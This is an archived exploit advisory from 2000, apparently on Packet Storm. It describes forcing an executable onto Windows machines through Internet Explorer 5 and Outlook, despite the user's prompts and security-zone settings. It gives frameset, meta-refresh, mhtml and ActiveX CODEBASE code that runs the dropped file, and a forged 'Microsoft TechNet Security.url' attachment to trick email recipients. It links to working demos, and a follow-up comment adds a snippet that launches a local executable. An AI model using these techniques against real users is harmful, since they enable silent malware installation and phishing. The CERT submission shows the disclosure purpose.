exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ie5.force-feed.txt

ie5.force-feed.txt
Posted Jun 29, 2000
Site malware.com

Microsoft Internet Explorer 5 and accompanying mail and news clients on win95, win98 and win2000 enjoy a unique status in that they choose to ignore user input. This document will show you how to manually force a file onto the target computer despite all prompts and warnings. Demonstration available here.

tags | exploit
systems | windows
SHA-256 | 7ee1f183e67576845d5933f7a7c1c7ed4d66b3108afe965dc0696834b71ac633

ie5.force-feed.txt

Change Mirror Download
Saturday, 24 June 2000

Microsoft Internet Explorer 5 and accompanying mail and news clients
on win95, win98 and win2000 enjoy a unique status in that they
choose to ignore user input. Specifically, we are able to manually
force a file onto the target computer despite all prompts and warnings.

A)

1. How so?

We again create a very simple html frameset and embed in base 64 our
file:

<frameset rows=3D"10%,*">
<frame src=3D"mars.exe" >
</frameset>

2. What will happen?

We create a simple html mail or news file and send it to the target
computer. Upon receipt and opening, the recipient will be prompted
whether they wish to 'save' or 'open' or 'cancel' - neither of these
work. While the recipient contemplates the choices, the file is
injected into the temp folder. Selecting any one of the three
choices proves useless. The file is still delivered to the temp folder. In
addition setting the so-called Security Zone settings to: DISABLE generates
a different prompt that is: "...your security settings do not allow file
downloads...[something to this effect]" with the only option being: OK.
Again selecting this proves useless.
=20
The file is still delivered to the temp folder.

3. And?

Whe then create a second file containing a different new ActiveX
control(CLSID:15589FA1-C456-11CE-BF01-00AA0055595A) which allows us to
execute files locally. We embed the simple JavaScripting that runs
this together with the ActiveX control in base64 and embed that in a
second html frame:

<frameset rows=3D"10%,*">
<frame src=3D"mars.exe" >
<frame src=3D"lunar.mhtml" >
</frameset>

We again apply the very simple HTTP-EQUIV meta tag known as refresh.

<meta http-equiv=3D"refresh"content=3D"5;
url=3Dmhtml:file://C:\WINDOWS\TEMP\lunar.mhtml">

and repack once again in base64.

4. Results being?

On the following generic and diluted web-based working example the
link is clicked, the file mars.mhtml will deposit both the *.exe and
second *.mhtml files into the temp. The client will be prompted as
to either 'save' 'open' or 'cancel' regardless of the choice as soon
as the prompt has been closed down, the meta refresh will bounce to
the *.mhtml in the temp, open it and execute the JavaScript and
ActiveX control and run the *.exe.

Again, because we are working locally (from C:\WINDOWS\TEMP) none of
the so-called Security Zone settings apply.

Working Example:

Note: to be executed off the web. Harmless *.exe incorporated. 5-second
delay after clearing the prompt

http://members.xoom.com/malware/mars.mhtml

B)

5. Can we do this from email?

Yes. However, with greater likelihood of failure. Consider the
following:

Create two sets of html messages:

(a) one comprising the file to be delivered:


<frameset rows=3D"10%,*">
<frame src=3D"refresh.bat" >
</frameset>

Working Example:

Note: to be executed from mail client. Simple *.bat containing @exit

http://members.xoom.com/malware/refresh.eml

(b) the second comprising a fraudulent, manufactured *.url:

Content-Type: application/octet-stream;
name=3D"Microsoft TechNet Security.url"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment;
filename=3D"Microsoft TechNet Security.url"

[DEFAULT]
BASEURL=3DC:\WINDOWS\TEMP\refresh.bat
[InternetShortcut]
URL=3DC:\WINDOWS\TEMP\refresh.bat

We include a fake link: <font color=3Dblue style=3D"cursor:hand">....

The recipient will then be forced to entertain the fraudulent *.url

Working Example:

Note: to be executed from mail client.

http://members.xoom.com/malware/secureme.eml

6. Far Fetched Scenario?

Yes indeed. Send the first mail message to the target computer
followed by the second. The recipient will open the first mail
message, be advised that a file is attempting to download and
what would they like to do: 'save' or 'open' or 'cancel' while this
is being contemplated, the file is delivered to the temp folder. The
recipient then continues with their morning activities of reading
their email and opens the second mail message. Certainly innocent
enough looking and of course Urgent and from a Trusted Source=99.
Through the false link, they are then forced open the attached *.url
which points to the C:\WINDOWS\TEMP\ where the delivered file waits.

This scenario can be incorporated into one single self-contained
mail message. However the likelihood of the recipient after noting
an attempted file download warning and then continuing with opening
the *.url would (or should) be even slimmer. However, you never
know.

Notes:

1. Tested on default installs of win95, win98 and win2000 and IE5.0
and IE5.1 with accompanying mail and news clients. All up-to-date with
security patches and all with the so-called Security Zone set to: DISABLE
where possible.

2. The Outlook Patch should effectively contain or disallow the
*.url attachment. There is a workaround for that.

3. The files are still delivered to the default temp folder.
Relocate the default temp folder.

4. Submitted to CERT 6/23/00 VU#26654

--


Regarding the mars exploit demo at
http://members.xoom.com/malware/mars.mhtml. There seems to be two seperate
problems being exploited here for the desired effect of downloading and
executing code.

You can get any local .exe to execute in IE by refering to it in the
CODEBASE parameter of an ActiveX object tag. The CLASSID can be anything
but all zeros. Here is a code snippet, courtesy of Dildog, which will
execute calc.exe if it is in c:\windows\system32\

<HTML>
<HEAD>
</HEAD>
<BODY>
<OBJECT CLASSID='CLSID:10000000-0000-0000-0000-000000000000'
CODEBASE='c:\windows\system32\calc.exe'></OBJECT>
</BODY></HTML>

The other problem is the fact that .exe files can get downloaded to your
local system without you being able to cancel the operation. I tested the
malware exploit on win98 with medium security settings (the default) and
it worked as promised.

But what was far worse was it worked at the high security setting also. A
warning message came up saying "Due to your security settings you cannot
download that file." You press OK and the file is downloaded anyway. Then
it executes when used as the codebase of an ActiveX control.

The demo exploit won't work in W2K because the temp directory where the
.exe is downloaded to is "c:\documents and
settings\'username'\local settings\temp". If it is possible to get the
username through JavaScript and another ActiveX control it could possibly
be made to work there also.



Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close